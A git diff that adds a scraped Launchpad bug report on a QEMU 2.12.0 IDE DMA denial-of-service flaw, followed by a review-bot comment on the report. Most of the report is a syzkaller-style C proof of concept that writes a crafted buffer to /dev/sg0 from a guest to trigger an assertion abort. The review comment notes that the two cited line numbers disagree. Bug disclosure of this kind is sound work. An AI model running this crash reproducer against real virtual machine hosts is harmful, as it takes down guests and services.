Diffstat (limited to 'results/scraper/launchpad-without-comments/1777315')
-rw-r--r--results/scraper/launchpad-without-comments/177731572
1 files changed, 72 insertions, 0 deletions
diff --git a/results/scraper/launchpad-without-comments/1777315 b/results/scraper/launchpad-without-comments/1777315
new file mode 100644
index 00000000..4015f04c
--- /dev/null
+++ b/results/scraper/launchpad-without-comments/1777315
@@ -0,0 +1,72 @@
+IDE short PRDT abort
+
+Hi,
+QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0
+
+run the program in qemu-2.12.0:
+#define _GNU_SOURCE 
+#include <endian.h>
+#include <sys/syscall.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <stdint.h>
+#include <string.h>
+
+static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
+{
+        if (a0 == 0xc || a0 == 0xb) {
+                char buf[128];
+                sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
+                return open(buf, O_RDWR, 0);
+        } else {
+                char buf[1024];
+                char* hash;
+strncpy(buf, (char*)a0, sizeof(buf) - 1);
+                buf[sizeof(buf) - 1] = 0;
+                while ((hash = strchr(buf, '#'))) {
+                        *hash = '0' + (char)(a1 % 10);
+                        a1 /= 10;
+                }
+                return open(buf, a2, 0);
+        }
+}
+
+uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
+void loop()
+{
+        long res = 0;
+memcpy((void*)0x20000000, "/dev/sg#", 9);
+        res = syz_open_dev(0x20000000, 0, 2);
+        if (res != -1)
+                r[0] = res;
+        res = syscall(__NR_dup2, r[0], r[0]);
+        if (res != -1)
+                r[1] = res;
+*(uint8_t*)0x20000ec0 = 0;
+*(uint8_t*)0x20000ec1 = 0;
+*(uint8_t*)0x20000ec2 = 0;
+*(uint8_t*)0x20000ec3 = 0;
+*(uint32_t*)0x20000ec8 = 0;
+*(uint8_t*)0x20000ed8 = 0;
+*(uint8_t*)0x20000ed9 = 0;
+*(uint8_t*)0x20000eda = 0;
+*(uint8_t*)0x20000edb = 0;
+memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12);
+        syscall(__NR_write, r[1], 0x20000ec0, 0x323);
+}
+
+int main()
+{
+        syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
+        loop();
+        return 0;
+}
+this will crash qemu, output information:
+ qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.
+
+
+Thanks 
+owl337
\ No newline at end of file
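Review bot: The added report is internally inconsistent about where the abort happens: the title line cites `hw/ide/core.c:871`, while the quoted crash output cites `hw/ide/core.c:843` for the same `ide_dma_cb` assertion, so anyone triaging this against qemu-2.12.0 should locate the failure by the assertion text (`n * 512 == s->sg.size`) rather than by either line number. The reproducer also never checks that the device opened: if `syz_open_dev("/dev/sg0")` returns -1, `r[0]` stays -1, `dup2(r[0], r[0])` fails, and the final `write(r[1], 0x20000ec0, 0x323)` targets fd -1, so in a guest without a readable `/dev/sg0` the program exits silently without exercising the IDE DMA path at all. Because this is scraped bug-report text rather than project code, I would not edit the body, but a short note at the top of the file stating that the two line numbers disagree and that the PoC presumes a writable `/dev/sg0` inside the guest would save the next reader a false negative. The report does not explain how the mostly zeroed 0x323-byte payload becomes a short PRDT at the IDE layer, which is worth flagging as unverified rather than assuming.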